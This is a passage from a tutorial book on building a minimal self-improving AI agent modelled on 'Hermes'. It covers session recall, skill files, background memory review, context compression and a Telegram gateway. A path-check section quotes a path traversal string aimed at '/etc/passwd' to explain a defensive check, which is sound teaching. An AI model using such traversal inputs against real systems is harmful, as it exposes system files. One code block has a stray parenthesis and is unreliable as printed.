Memory pollution: Hermes has no automatic expiration mechanism. If the agent saves an incorrect observation early on (e.g., "user prefers Python 2"), that error will persist and affect future behavior. Periodic manual review of the MEMORY.md file is important. This is a known limitation.
Minimal version vs. real Hermes

- This book: two flat files, MEMORY.md (2,200 chars) + USER.md (1,375 chars). Frozen snapshot loaded at session start. Simple append with oldest-first eviction.
- Hermes v0.8: same built-in provider (MEMORY.md + USER.md), plus a pluggable MemoryProvider architecture. External providers (Honcho, Mem0, Hindsight) can be swapped in. Only one external provider active at a time. Hooks: on_session_end(), on_pre_compress(), on_delegation(), on_memory_write().

Source: agent/memory_manager.py, agent/memory_provider.py

09 Cross-Session Recall

The trick is not remembering everything. It is finding the right piece at the right time.

Cross-session recall connects the session database (Chapter 7) to the current conversation. When the agent needs to remember something from a past session, it searches the FTS5 index, retrieves the most relevant fragments, and summarizes them for injection into the current context.

class SessionRecall:
    def __init__(self, session_db, llm_client, model, max_tokens: int = 300):
        self.db = session_db
        self.client = llm_client
        self.model = model
        self.max_tokens = max_tokens  # budget for each session summary

    def recall(self, query: str, max_sessions: int = 3) -> str:
        """Search past sessions and return summarized context."""
        # Step 1: FTS5 search
        results = self.db.search(query, limit=30)
        if not results:
            return ""

        # Step 2: Group by session, take top N unique sessions
        seen_sessions = {}
        for r in results:
            sid = r["session_id"]
            if sid not in seen_sessions:
                seen_sessions[sid] = r
            if len(seen_sessions) >= max_sessions:
                break

        # Step 3: For each session, load conversation around matches
        summaries = []
        for sid, meta in seen_sessions.items():
            messages = self.db.get_session_messages(sid, limit=30)
            transcript = self._format_transcript(messages)

            # Step 4: Summarize via cheap/fast LLM
            summary = self._summarize(query, transcript, meta["date"])
            summaries.append(summary)

        return "\n\n---\n\n".join(summaries)

    def _summarize(self, topic, transcript, date) -> str:
        resp = self.client.chat.completions.create(
            model=self.model,
            messages=[
                {"role": "system", "content":
                 "Summarize this past conversation, focusing on information "
                 "relevant to the given topic. Be concise. 200 words max."},
                {"role": "user", "content":
                 f"Topic: {topic}\nDate: {date}\n\nTRANSCRIPT:\n{transcript}"}
            ],
            max_tokens=self.max_tokens,  # default 300
        )
        return resp.choices[0].message.content

The four-step flow:

  1. FTS5 search. Find messages matching the query across all sessions.
  2. Group by session. Take the top 3 unique sessions (not individual messages).
  3. Load conversation context. For each session, pull surrounding messages to preserve conversational flow.
  4. Summarize via LLM. Use a cheap, fast model to condense each session's transcript into a focused summary. This is where the real token savings happen.
Why summarize instead of injecting raw transcripts? A past session might be 10,000 tokens. You might recall 3 sessions. That is 30,000 tokens of raw context for every query. Summarization compresses each to ~200 words, keeping the total under 2,000 tokens. The cost of one cheap LLM call is far less than the cost of stuffing 30K extra tokens into every subsequent API call.

Making it a tool

Cross-session recall is exposed to the agent as a tool called session_search. The agent decides when to search its own history:

registry.register(
    name="session_search",
    description="Search past conversations for relevant context. "
                 "Use when you need to recall what was discussed previously.",
    parameters={
        "type": "object",
        "properties": {
            "query": {"type": "string", "description": "Search topic"},
        },
        "required": ["query"],
    },
    handler=recall.recall,
    category="memory",
)

This is elegant. The agent is not force-fed history. It actively searches when it recognizes that past context would be useful. "That approach we discussed last week" triggers a search. "Write a hello world script" does not.

Minimal version vs. real Hermes

- This book: synchronous search + summarize. Top 3 sessions. Single summarization model.
- Hermes v0.8: async summarization via _summarize_session(). Session truncation around match locations (_truncate_around_matches(), 100K char limit). Groups by session with deduplication. Uses auxiliary LLM (cheap/fast, e.g. Gemini Flash) for summaries (up to 10K tokens per session).

Source: tools/session_search_tool.py, hermes_state.py (search_messages())
Part IV

Skills That Grow

10 The Skill System

Skills are folders containing a SKILL.md file, supporting references, and templates. The agent discovers, loads, and manages them through three dedicated tools.

If session memory is "what happened" and persistent memory is "who you are," then skills are "how to do things." Each Skill is a directory under ~/.hermes/skills/ containing a SKILL.md file and optional supporting files.

Skill directory structure

~/.hermes/skills/
├── git-commit-style/
│   └── SKILL.md              # Required: instructions
├── code-review/
│   ├── SKILL.md
│   ├── references/           # Supporting documentation
│   │   └── style-guide.md
│   ├── templates/            # Output templates
│   │   └── review-format.md
│   ├── scripts/              # Helper scripts
│   └── assets/               # Supplementary files
└── mlops/                    # Category folder
    └── training/
        └── SKILL.md

This is the agentskills.io standard, supported by Claude Code, Cursor, Codex CLI, Gemini CLI, and others. Skills are portable across tools.

Anatomy of a SKILL.md file

---
name: git-commit-style
description: Enforce a consistent Git commit message format
version: "1.0.0"
platforms: [macos, linux]    # Optional: restrict to OS
metadata:
  hermes:
    tags: [git, workflow]
    requires_toolsets: [terminal]
---

# Git Commit Style

## Trigger
Activate when the user asks me to commit code, write a commit
message, or review commit history.

## Rules
### Commit Message Format
- First line: type(scope): summary (50 chars max)
- Blank line
- Body: explain WHY, not WHAT

## Example
feat(auth): add QR code login

Previously users could only log in with a phone number.
Now they scan a QR code and they're in.
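
A skill loader needs to split this frontmatter from the markdown body. Here is a minimal sketch of such a parser (it handles flat `key: value` pairs only; real Hermes uses a YAML parser and also understands the nested metadata block):

```python
import re

def parse_frontmatter(text: str):
    """Split a SKILL.md into (metadata dict, markdown body).
    Minimal sketch: flat `key: value` pairs only; nested entries skipped."""
    match = re.match(r"^---\n(.*?)\n---\n(.*)$", text, re.DOTALL)
    if not match:
        return None, text          # no frontmatter: whole file is the body
    meta = {}
    for line in match.group(1).splitlines():
        if line.startswith((" ", "\t")) or ":" not in line:
            continue               # skip nested/indented YAML entries
        key, _, value = line.partition(":")
        meta[key.strip()] = value.strip().strip('"')
    return meta, match.group(2)

doc = (
    "---\n"
    "name: git-commit-style\n"
    "description: Enforce a consistent Git commit message format\n"
    "---\n"
    "# Git Commit Style\n"
)
meta, body = parse_frontmatter(doc)
# meta["name"] == "git-commit-style"; body starts with "# Git Commit Style"
```

The `(meta, body)` return shape matches how parse_frontmatter is consumed by skills_list later in this chapter.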

Three tools, three tiers of progressive disclosure

Hermes uses a progressive disclosure pattern to keep token costs flat as the skill library grows. The agent sees skill names cheaply and loads full content only when needed:

- skills_list — name + description for all skills (max 64 + 1024 chars each). Token cost: low, metadata only.
- skill_view — full SKILL.md body, or a specific file within the skill directory. Token cost: medium, one skill at a time.
- skill_manage — create / edit / patch / delete / write_file / remove_file. Token cost: varies by action.
# The three skill tools
import json

def skills_list(category=None) -> str:
    """List all skills with metadata. Progressive disclosure tier 1."""
    skills = []
    for skill_md in skills_dir.rglob("SKILL.md"):
        meta, _ = parse_frontmatter(skill_md.read_text())
        if not meta or not skill_matches_platform(meta):
            continue
        skills.append({
            "name": meta.get("name", skill_md.parent.name),
            "description": meta.get("description", "")[:1024],
        })
    return json.dumps(skills, indent=2)

def skill_view(name: str, file_path: str = None) -> str:
    """Load full skill content. Progressive disclosure tier 2-3."""
    skill_dir = find_skill(name)
    if file_path:
        # Tier 3: load a specific reference/template file
        return (skill_dir / file_path).read_text()
    # Tier 2: load the main SKILL.md
    return (skill_dir / "SKILL.md").read_text()

def skill_manage(action, name, content=None, category=None,
                  file_path=None, file_content=None) -> str:
    """Create, edit, patch, or delete skills."""
    if action == "create":
        # Creates skill_dir/SKILL.md with validated frontmatter
        skill_dir = skills_dir / (category or "") / name
        skill_dir.mkdir(parents=True)
        (skill_dir / "SKILL.md").write_text(content)
    elif action == "patch":
        # Find-and-replace within SKILL.md or a supporting file
        # Uses exact string matching -- precise, token-efficient
        ...
    elif action == "edit":
        # Full rewrite of SKILL.md
        ...
    elif action == "write_file":
        # Add/overwrite a supporting file (references/, templates/, etc.)
        ...
    elif action == "delete":
        # Remove entire skill directory
        ...
Security: Hermes runs a security scan (skills_guard.py) on every agent-created skill. It checks for shell injection, credential exposure, and path traversal. The skill_manage tool validates that file paths stay within ALLOWED_SUBDIRS (references, templates, scripts, assets) and rejects path traversal attempts.
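
The path check can be sketched as follows. ALLOWED_SUBDIRS comes from the source; the function name, signature, and exact semantics here are assumptions for illustration:

```python
from pathlib import Path

ALLOWED_SUBDIRS = {"references", "templates", "scripts", "assets"}

def safe_skill_path(skill_dir: Path, file_path: str) -> Path:
    """Reject path traversal and files outside the allowed subdirectories."""
    root = skill_dir.resolve()
    target = (root / file_path).resolve()
    # Resolving collapses any ../ segments; if the result escapes the
    # skill directory, refuse it
    if root != target and root not in target.parents:
        raise ValueError("path traversal rejected")
    parts = target.relative_to(root).parts
    if parts and parts[0] != "SKILL.md" and parts[0] not in ALLOWED_SUBDIRS:
        raise ValueError(f"files must live under {sorted(ALLOWED_SUBDIRS)}")
    return target
```

Resolving before comparing is the key move: a naive string prefix check can be fooled by `references/../../etc/passwd`, while a resolved path cannot.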
Minimal version vs. real Hermes

- This book: three functions (skills_list, skill_view, skill_manage). Basic YAML frontmatter parsing. Folder discovery via rglob("SKILL.md").
- Hermes v0.8: platform filtering (platforms: [macos]). Environment variable prerequisites with interactive secret collection. Atomic writes via tempfile + os.replace(). Security scanning on create. External skill directories. Skills Hub integration for community skills. 100K character size limit per SKILL.md.

Source: tools/skills_tool.py (skills_list, skill_view), tools/skill_manager_tool.py (skill_manage), agent/skill_utils.py

11 Autonomous Skill Creation

After finishing a complex task, the agent asks itself: "Would this solution be useful again?" If yes, it writes a Skill.

This is the mechanism that turns one-time problem solving into reusable knowledge. The agent does not silently create a Skill for every task. Per the skill_manage tool description, the agent offers to save as a skill and confirms with the user before creating or deleting. The background nudge system (Chapter 13) can also trigger skill review, but the confirmation flow is the designed behavior for interactive sessions.

When to create a Skill

The real Hermes triggers Skill creation when a task had:

- five or more tool calls
- error recovery (something failed and the approach changed)
- a non-obvious workflow that would not be trivially rediscovered

The retrospective prompt

Skill creation is driven by a prompt, not by code heuristics. After the task completes, the agent receives a retrospective prompt that asks it to evaluate its own work:

class Retrospective:
    PROMPT = """Review the conversation that just finished.

1. MEMORY: Are there facts worth remembering long-term?
   - User preferences discovered
   - Project context learned
   - Solutions that worked (or didn't)
   If yes, call the memory tool to save each observation.

2. SKILL CREATION: Was this task complex enough to warrant a reusable Skill?
   Criteria: 5+ tool calls, error recovery, non-obvious workflow.
   If yes, call skill_manage with action="create" and:
   - A descriptive name
   - Trigger conditions (when should this Skill activate)
   - Step-by-step procedure
   - Constraints and gotchas discovered

3. SKILL UPDATE: Was an existing Skill used? Did it work well?
   If not, call skill_manage with action="patch" (old_string/new_string).

Be selective. Not every task deserves a Skill. Not every fact deserves
to be remembered. Only save what will genuinely help in the future."""

    def run(self, agent, conversation_messages):
        """Run retrospective analysis on the completed conversation."""
        # Build a summary of what just happened
        summary = self._summarize_conversation(conversation_messages)

        # Ask the agent to evaluate
        agent.run(
            f"[RETROSPECTIVE]\n\n"
            f"Conversation summary:\n{summary}\n\n"
            f"{self.PROMPT}"
        )
The key insight: Skill creation is not a separate code path with if/else logic. It is the same agent loop, given a different prompt. The LLM's judgment determines what is worth saving. This is what makes the system flexible: you do not need to anticipate every scenario in code. You write a prompt that teaches the agent how to think about what is worth keeping.

How the agent creates a skill

The agent calls skill_manage with action="create". It provides the full SKILL.md content including frontmatter:

# The agent generates this tool call:
skill_manage(
    action="create",
    name="csv-to-database",
    category="data",  # optional subfolder
    content="""---
name: csv-to-database
description: Clean CSV data and import into a database
version: "1.0.0"
---

# CSV to Database Import

## Trigger
Activate when the user asks to import CSV, clean data, or load
data into a database.

## Steps
1. Read the CSV and detect column types
2. Clean: strip whitespace, handle nulls, validate dates
3. Create table with appropriate column types
4. Bulk insert with error logging

## User Preferences
- Connection method: psycopg2 (user prefers this over SQLAlchemy)
- Always check if table exists first
"""
)

This creates ~/.hermes/skills/data/csv-to-database/SKILL.md. The skill is immediately available for the next conversation.

Source: tools/skill_manager_tool.py (skill_manage function, actions: create/edit/patch/delete/write_file/remove_file)

12 Skill Self-Improvement

Creating a Skill is step one. Updating it based on real-world feedback is what makes it "self-improving."

Traditional Skills are static: you write them, and they stay the same until someone manually edits them. Hermes Skills are alive. Every time a Skill is used and the user provides feedback, the agent can update the Skill file to incorporate what it learned.

The improvement cycle

1. Execute — follow the Skill
2. Feedback — the user corrects
3. Patch — update the Skill file
4. Next use — the improved version runs

The cycle repeats with each use.

The patch action

Hermes prefers patching over rewriting. The skill_manage tool's patch action does exact string find-and-replace within a SKILL.md or supporting file. This is important for two reasons: it preserves parts that work, and it uses far fewer tokens than a full rewrite.

# The agent generates this tool call:
skill_manage(
    action="patch",
    name="github-daily-digest",
    old_string="3. Group by type (PR / Issue)",
    new_string="3. Group by type (PR / Issue / Discussion)",
)
# Exact find-and-replace within SKILL.md.
# old_string must be unique unless replace_all=True.
# Include enough surrounding context to ensure uniqueness.
# Use file_path="references/api.md" to patch a supporting file.
# Use action="edit" for full rewrites when patches are too numerous.
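
The uniqueness rule can be sketched as a small helper (the function name and error messages here are illustrative, not from the Hermes source):

```python
def apply_patch(text: str, old_string: str, new_string: str,
                replace_all: bool = False) -> str:
    """Exact find-and-replace with the uniqueness check described above."""
    count = text.count(old_string)
    if count == 0:
        raise ValueError("old_string not found in file")
    if count > 1 and not replace_all:
        # Ambiguous patches fail loudly instead of editing the wrong spot
        raise ValueError(
            f"old_string occurs {count} times; "
            "add surrounding context or set replace_all=True")
    return text.replace(old_string, new_string)
```

Failing on ambiguity is what makes exact-string patching safe for an LLM to drive: the model is forced to supply enough context to pin down one location.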

A concrete example of how this works in practice:

  1. You ask Hermes to sort through GitHub notifications. It follows its "GitHub Daily Digest" Skill, returning only PRs and Issues.
  2. You say: "Include Discussions too." Hermes adds Discussions to this response.
  3. Hermes recognizes this is a correction to the Skill. It calls skill_manage(action="patch", old_string="...", new_string="...") to update the Skill's steps.
  4. Next time you say "check GitHub," the Skill already includes Discussions. You never have to mention it again.
Intuition: This is the automation of Mitchell Hashimoto's "add a rule to CLAUDE.md every time the AI makes a mistake" approach. The difference is that the agent adds the rule itself, without human effort. The trade-off is less precision (the agent might misunderstand the feedback) in exchange for zero maintenance burden.
Part V

Putting It All Together

13 The Learning Loop: Nudges, Background Review, and Compression Flush

The Learning Loop is not a single post-task retrospective. It is three distinct trigger mechanisms that fire at different times, all running in the background.

None of the components we have built are individually novel. Memory, skills, retrieval, user profiling: the AI field has seen all of these before. What Hermes does differently is wire them into a causal chain where each component feeds the next. But the "how" matters as much as the "what."

The book's earlier chapters presented a simplified model of a single retrospective that fires after each task. The real Hermes is more nuanced. Learning is triggered by three independent mechanisms:

- Memory nudge — fires every N user turns (default: 10); background review of the conversation for facts worth persisting.
- Skill nudge — fires every N tool-calling iterations (default: 10); background review for reusable procedures to create or update.
- Compression flush — fires when the context window hits 50% capacity; extracts memories before old messages are summarized and discarded.

Nudge counters

Hermes maintains two counters that tick up during normal operation:

class Agent:
    def __init__(self):
        # Nudge configuration (from config.yaml)
        self._memory_nudge_interval = 10   # turns between memory reviews
        self._skill_nudge_interval = 10    # tool iterations between skill reviews
        self._turns_since_memory = 0
        self._iters_since_skill = 0

    def run_turn(self, user_input):
        # Before the agent loop: check memory nudge
        self._turns_since_memory += 1
        should_review_memory = (
            self._turns_since_memory >= self._memory_nudge_interval
        )
        if should_review_memory:
            self._turns_since_memory = 0

        # Run normal agent loop...
        response = self._agent_loop(user_input)

        # After the agent loop: check skill nudge.
        # (_iters_since_skill is incremented inside _agent_loop,
        # once per tool-calling iteration.)
        should_review_skills = (
            self._iters_since_skill >= self._skill_nudge_interval
        )
        )
        if should_review_skills:
            self._iters_since_skill = 0

        # Counters reset when the agent actually uses the tool
        # (not just when the nudge fires)

        # Spawn background review if either trigger fired
        if should_review_memory or should_review_skills:
            self._spawn_background_review(
                review_memory=should_review_memory,
                review_skills=should_review_skills,
            )

        return response

The counters also reset when the agent voluntarily uses the memory or skill_manage tool during normal conversation. If the agent is already saving memories on its own, the nudge does not need to fire.

Background review: a forked agent on a separate thread

When a nudge fires, Hermes does not inject a "please review your work" message into the user-facing conversation. Instead, it forks a new agent instance on a background thread with a snapshot of the conversation:

def _spawn_background_review(self, review_memory, review_skills):
    import threading

    # Pick the right prompt
    if review_memory and review_skills:
        prompt = COMBINED_REVIEW_PROMPT
    elif review_memory:
        prompt = MEMORY_REVIEW_PROMPT
    else:
        prompt = SKILL_REVIEW_PROMPT

    messages_snapshot = list(self.messages)

    def _run():
        # Create a new agent with same model and tools
        review_agent = Agent(model=self.model, max_iterations=8)  # low budget
        # Share the memory/skill stores (thread-safe writes)
        review_agent.memory_store = self.memory_store
        # Disable nudges on the review agent (no infinite recursion)
        review_agent._memory_nudge_interval = 0
        review_agent._skill_nudge_interval = 0
        # Run with the conversation snapshot + review prompt
        review_agent.run(messages_snapshot, prompt)

    threading.Thread(target=_run, daemon=True).start()

This is a critical design choice: the review never competes with the user's task for model attention. The user sees their response immediately. The learning happens silently in the background.

Compression flush: the third trigger

When the context window hits 50% capacity, compression kicks in. But before old messages are summarized and discarded, Hermes gives the agent one final chance to save anything important:

def compress_context(self, messages):
    # Step 1: Memory flush -- let the model save memories before they're lost
    self.flush_memories(messages, min_turns=0)

    # Step 2: Notify external memory providers
    if self.memory_manager:
        self.memory_manager.on_pre_compress(messages)

    # Step 3: Now compress (summarize middle, keep head + tail)
    compressed = self.compressor.compress(messages)

flush_memories() appends a user-role sentinel containing [System: The session is being compressed. Save anything worth remembering...]. It is a user message, not a system message, so it fits naturally into the conversation flow. The agent gets one API call with the memory tool available. After any saves, all flush artifacts (the sentinel and any tool calls) are stripped from the message list. The user never sees this exchange.

The on_pre_compress() hook notifies external memory providers (like Honcho) so they can also extract insights from the about-to-be-discarded messages.
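
The flush flow can be sketched as follows. The stub stands in for a real API call, and the one_shot_with_tools helper name is hypothetical:

```python
FLUSH_SENTINEL = ("[System: The session is being compressed. "
                  "Save anything worth remembering with the memory tool.]")

def flush_memories(agent, messages: list) -> None:
    """Append the sentinel, run one tool-enabled call, strip all artifacts."""
    original_len = len(messages)
    # User-role sentinel, so it fits the conversation flow naturally
    messages.append({"role": "user", "content": FLUSH_SENTINEL})
    agent.one_shot_with_tools(messages)   # hypothetical: one API call
    # Remove the sentinel and any tool traffic it produced --
    # the user never sees this exchange
    del messages[original_len:]

class StubAgent:
    """Stand-in so the sketch runs without a real model."""
    def one_shot_with_tools(self, messages):
        messages.append({"role": "assistant", "content": "Saved one observation."})

history = [{"role": "user", "content": "hi"}]
flush_memories(StubAgent(), history)
# history is unchanged afterwards: the flush left no trace in the transcript
```

The important property is the cleanup: memories land on disk as a side effect of the tool call, while the visible message list is restored exactly as it was.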

The Flywheel (figure): five stages — Memory Curation, Skill Creation, Skill Improvement, FTS5 Recall, User Profiling — connected in a positive feedback loop, each stage feeding the next (memory feeds raw material to skill creation; skill usage triggers improvement; FTS5 enables precise recall; profiling personalizes what gets targeted next).

Here is how the chain works:

  1. Memory curation feeds Skill creation. The observations stored in memory provide the raw material. The agent notices "I've done this CSV import three times now" because it can search past sessions.
  2. Skill usage generates new memories. Every time a Skill runs, the results (success, failure, user corrections) get recorded in session memory, triggering potential Skill improvements.
  3. Improved Skills produce better results. Better results mean the user is satisfied more often, which means fewer corrections, which means the agent's user model becomes more accurate.
  4. Better user modeling makes memory curation more targeted. The agent knows what this specific user cares about, so it saves observations that are genuinely relevant.
  5. More targeted memories feed better Skill creation. And the loop continues.

This is a positive feedback loop. The more you use it, the stronger every step gets. Use it for three to five days, and you will notice a clear difference.

The review prompts

The background review agent receives one of three prompts depending on which triggers fired:

Memory review prompt (actual): "Review the conversation above and consider saving to memory if appropriate. Focus on: Has the user revealed things about themselves -- their persona, desires, preferences, or personal details worth remembering? Has the user expressed expectations about how you should behave? If something stands out, save it using the memory tool. If nothing is worth saving, just say 'Nothing to save.' and stop."
Skill review prompt (actual): "Review the conversation above and consider saving or updating a skill if appropriate. Focus on: was a non-trivial approach used to complete a task that required trial and error, or changing course due to experiential findings? If a relevant skill already exists, update it with what you learned. Otherwise, create a new skill if the approach is reusable."
When both triggers fire simultaneously, a combined prompt covers both. The review agent has a low iteration budget (max 8) to prevent runaway costs.

Minimal version vs. real Hermes

- This book: two nudge counters + compression flush. Background thread with forked agent. Configurable intervals.
- Hermes v0.8: same architecture, plus: nudge counters persist across run_conversation() calls in CLI mode. External memory providers get on_session_end(), on_pre_compress(), and on_delegation() hooks. Review agent stdout/stderr redirected to /dev/null. Memory flush injects a user-role sentinel message, executes one API call, then strips all artifacts.

Source: run_agent.py lines 2034-2115 (_spawn_background_review), lines 6390-6420 (flush_memories), lines 7629-7638 (nudge logic), lines 10218-10246 (post-turn trigger)

14 Context Compression

Long conversations blow up the context window. Compression keeps the agent running without hitting token limits.

LLMs have a fixed context window (128K tokens for many current models), and even below that limit, cost scales linearly with the tokens you send. A long coding session can easily hit 50K+ tokens. Without compression, the agent either crashes or becomes very expensive.

Hermes implements a middle-out compression strategy:

  1. Protect the head. The first 3 messages (system prompt + initial user message + first assistant response) are never compressed. They contain the identity and task context.
  2. Protect the tail. The most recent ~20K tokens are kept intact. This is the active working context.
  3. Compress the middle. Everything between head and tail is summarized by a cheap, fast LLM into a structured summary.
class ContextCompressor:
    THRESHOLD = 0.5  # Trigger at 50% of context window
    TAIL_TOKENS = 20000
    HEAD_MESSAGES = 3

    def maybe_compress(self, messages, max_tokens):
        estimated = self._estimate_tokens(messages)
        if estimated < max_tokens * self.THRESHOLD:
            return messages  # No compression needed

        head = messages[:self.HEAD_MESSAGES]
        tail = self._get_tail(messages, self.TAIL_TOKENS)
        # Slice by index math: messages[3:-0] would be empty if tail is empty
        middle = messages[self.HEAD_MESSAGES:len(messages) - len(tail)]

        if not middle:
            return messages

        # Summarize the middle section
        summary = self._summarize_middle(middle)

        return head + [{
            "role": "system",
            "content": f"[Compressed context summary]\n{summary}"
        }] + tail

    def _summarize_middle(self, messages) -> str:
        transcript = "\n".join(
            # content is None on tool-call messages; fall back before slicing
            f"{m['role']}: {(m.get('content') or '[tool call]')[:200]}"
            for m in messages
        )
        resp = self.aux_client.chat.completions.create(
            model=self.aux_model,
            messages=[{
                "role": "system",
                "content": "Summarize this conversation segment. Include:\n"
                    "- Questions that were resolved\n"
                    "- Decisions that were made\n"
                    "- Pending work items\n"
                    "- Key facts discovered\n"
                    "Be concise. Under 500 words."
            }, {
                "role": "user",
                "content": transcript
            }],
            max_tokens=800,
        )
        return resp.choices[0].message.content

Before compression happens, two things fire (as described in Chapter 13): flush_memories() gives the agent one API call to save important observations, and on_pre_compress() notifies external memory providers. This way, facts are not lost to summarization.
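
_estimate_tokens does not need a real tokenizer: a rough characters-per-token heuristic (around 4 characters per token for English text) is accurate enough to drive a 50% threshold. A minimal sketch, not the real implementation:

```python
import json

def estimate_tokens(messages: list) -> int:
    """Cheap token estimate: serialized length / ~4 chars per token."""
    total_chars = sum(len(json.dumps(m)) for m in messages)
    return total_chars // 4
```

Slight overestimation is fine here; compressing a little early is much safer than overflowing the context window mid-task.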

Minimal version vs. real Hermes

- This book: threshold-based trigger. Protect head (3 messages) + tail (~20K tokens). Summarize middle via cheap LLM.
- Hermes v0.8: same core strategy, plus: flush_memories() before compression (one extra API call to save facts). on_pre_compress() hook for external memory providers. Iterative re-compression: if the summary from a previous compression is in the middle, it gets re-summarized. Structured summary template (Resolved/Pending/Remaining Work). System prompt invalidation + memory reload after compression.

Source: agent/context_compressor.py, run_agent.py lines 6564-6579 (compression trigger with memory flush)

15 Building the CLI and Gateway

The interface. Where the user meets the agent.

The CLI

The minimal CLI is a read-eval-print loop that initializes the agent and feeds it user input:

import yaml
from openai import OpenAI
from pathlib import Path

def main():
    # Load config
    config_path = Path.home() / ".mini-hermes" / "config.yaml"
    config = yaml.safe_load(config_path.read_text())

    # Initialize components
    client = OpenAI(
        api_key=config["model"]["api_key"],
        base_url=config["model"].get("base_url"),
    )
    data_dir = Path.home() / ".mini-hermes"

    session_db = SessionDB(data_dir / "state.db")
    persistent = PersistentMemory(data_dir)
    skill_loader = SkillLoader(data_dir / "skills")

    # Build system prompt ONCE (frozen snapshot for the session)
    builder = PromptBuilder()
    system_prompt = builder.build(
        memory_block=persistent.load(),  # frozen at session start
        skills_index=skill_loader.build_skills_index(),
        user_context="",
    )

    # Create session
    session_id = session_db.create_session()

    # Create agent with frozen system prompt
    agent = HermesAgent(
        client=client,
        model=config["model"]["model"],
        system_prompt=system_prompt,  # not rebuilt per turn
        tools=registry.get_schemas(),
        tool_handlers={t.name: t.handler for t in registry._tools.values()},
    )
    agent.session_db = session_db
    agent.session_id = session_id

    # REPL
    print("Mini-Hermes ready. Type 'exit' to quit.\n")
    while True:
        user_input = input("you > ").strip()
        if user_input.lower() in ("exit", "quit"):
            break
        if not user_input:
            continue

        response = agent.run_with_learning(user_input)
        print(f"\nhermes > {response}\n")

if __name__ == "__main__":
    main()

Extending to Telegram

Hermes supports 14 platforms through a single Messaging Gateway: one process that listens to all configured platforms simultaneously. The key design decision is that all platforms share the same memory database, the same skills directory, and the same session store.

However, the gateway does not keep a single agent instance alive. It creates a fresh agent object per message, loading the stored system prompt from the session DB so the Anthropic prefix cache still hits. This is an important distinction: session continuity comes from the database, not from a long-lived object in memory.

import asyncio

from telegram.ext import Application, MessageHandler, filters

async def handle_message(update, context):
    user_text = update.message.text

    # Create a fresh agent per message (like the real Hermes gateway).
    # The session DB provides continuity, not a long-lived object.
    session_id = get_or_create_session(update.effective_user.id)
    agent = HermesAgent(
        client=client,
        model=config["model"]["model"],
        system_prompt=load_system_prompt_from_session(session_id),
        tools=registry.get_schemas(),
        tool_handlers={t.name: t.handler for t in registry._tools.values()},
    )
    agent.session_db = session_db
    agent.session_id = session_id

    # run_with_learning is synchronous; run it in a worker thread so the
    # bot's event loop is not blocked while the agent thinks
    response = await asyncio.to_thread(agent.run_with_learning, user_text)
    await update.message.reply_text(response)

app = Application.builder().token(config["gateway"]["telegram"]["token"]).build()
# Handle plain text only; skip /commands such as /start
app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_message))
app.run_polling()
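The two helpers used above, `get_or_create_session` and `load_system_prompt_from_session`, were left abstract. One possible implementation, sketched here with the database connection passed explicitly and a `sessions` schema invented for illustration:

```python
import sqlite3
import uuid

def init_session_schema(db: sqlite3.Connection) -> None:
    """One row per platform user; the frozen system prompt rides along."""
    db.execute("""
        CREATE TABLE IF NOT EXISTS sessions (
            session_id    TEXT PRIMARY KEY,
            user_id       INTEGER UNIQUE,
            system_prompt TEXT
        )
    """)

def get_or_create_session(db, user_id, default_system_prompt=""):
    """Reuse the user's existing session, or mint one and freeze the prompt."""
    row = db.execute(
        "SELECT session_id FROM sessions WHERE user_id = ?", (user_id,)
    ).fetchone()
    if row:
        return row[0]
    session_id = uuid.uuid4().hex
    db.execute(
        "INSERT INTO sessions (session_id, user_id, system_prompt) VALUES (?, ?, ?)",
        (session_id, user_id, default_system_prompt),
    )
    return session_id

def load_system_prompt_from_session(db, session_id):
    """Return the stored prompt so the prefix cache sees identical bytes."""
    row = db.execute(
        "SELECT system_prompt FROM sessions WHERE session_id = ?", (session_id,)
    ).fetchone()
    return row[0] if row else None
```

Storing the prompt at session creation is what keeps the prefix cache hitting: every later message replays the exact same system prompt bytes.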

Deploy this on a $5 VPS and you have a 24/7 AI assistant reachable from your phone, with persistent memory across every conversation.

Minimal version vs. real Hermes

This book: Fresh agent per message. System prompt loaded from the session DB. Single-user Telegram bot.

Hermes v0.8: Gateway process (hermes gateway) with platform adapters for 14 services. Session routing tied to user IDs, not platforms. Cron ticking for scheduled tasks. Cross-platform conversation continuity. Fresh AIAgent per message with stored system prompt from session DB for cache consistency.

Source: gateway/run.py; run_agent.py lines 7650-7677 (system prompt caching on continuation)

16 What You Built and Where to Go Next

A review of the complete system, and pointers to everything we left out.

What you have

By following this guide, you have built a minimal but complete self-improving AI agent. Here is the component map:

Component         | What it does                                           | Hermes equivalent
Agent Loop        | Message -> tools -> response cycle                     | run_agent.py
Tool Registry     | Register, schema, dispatch tools                       | tools/registry.py
Prompt Builder    | Assemble identity + memory + skills                    | agent/prompt_builder.py
Prompt Caching    | system_and_3 cache breakpoints                         | agent/prompt_caching.py
Session DB        | SQLite + FTS5 conversation storage                     | hermes_state.py
Persistent Memory | MEMORY.md / USER.md                                    | Built-in memory provider
Session Recall    | FTS5 search + LLM summarization                        | tools/session_search_tool.py
Skill Tools       | skills_list / skill_view / skill_manage                | tools/skills_tool.py, tools/skill_manager_tool.py
Learning Loop     | Nudge counters + background review + compression flush | run_agent.py (_spawn_background_review)
Compression       | Middle-out context window management                   | agent/context_compressor.py
CLI               | Terminal interface                                     | cli.py

What we left out

The real Hermes has substantially more. Here is what to explore next, in order of impact:

Sub-agent delegation

Hermes can spawn up to 3 concurrent sub-agents, each with its own context and restricted toolset. Useful for parallel research (one agent per topic) or separating concerns (one codes, one tests, one reviews). The key insight: sub-agents get restricted tool access for both efficiency and security.
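The fan-out pattern can be sketched in a few lines. This is not Hermes's implementation, just the shape of it: a factory builds each sub-agent with a restricted tool allowlist (the tool names below are invented), and a thread pool caps concurrency at three.

```python
from concurrent.futures import ThreadPoolExecutor

# Hypothetical allowlist: sub-agents see only the tools their task needs
SUB_AGENT_ALLOWED_TOOLS = {"web_search", "read_file"}

def spawn_sub_agents(make_agent, tasks, max_concurrent=3):
    """Run up to `max_concurrent` sub-agents in parallel, one per task.

    `make_agent(allowed_tools=...)` is a factory that builds a fresh agent
    with its own context and a restricted toolset.
    """
    def run(task):
        agent = make_agent(allowed_tools=SUB_AGENT_ALLOWED_TOOLS)
        return agent.run(task)

    with ThreadPoolExecutor(max_workers=max_concurrent) as pool:
        # pool.map preserves task order, so results line up with inputs
        return list(pool.map(run, tasks))
```

Each sub-agent starting from an empty context is the point: parallel research stays cheap because no sub-agent drags the parent's full conversation along.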

MCP integration

Model Context Protocol lets the agent connect to 6,000+ external applications (GitHub, Slack, Jira, databases) via a standard protocol. Each MCP server is a separate process, communicating over stdio or HTTP.

Honcho user modeling

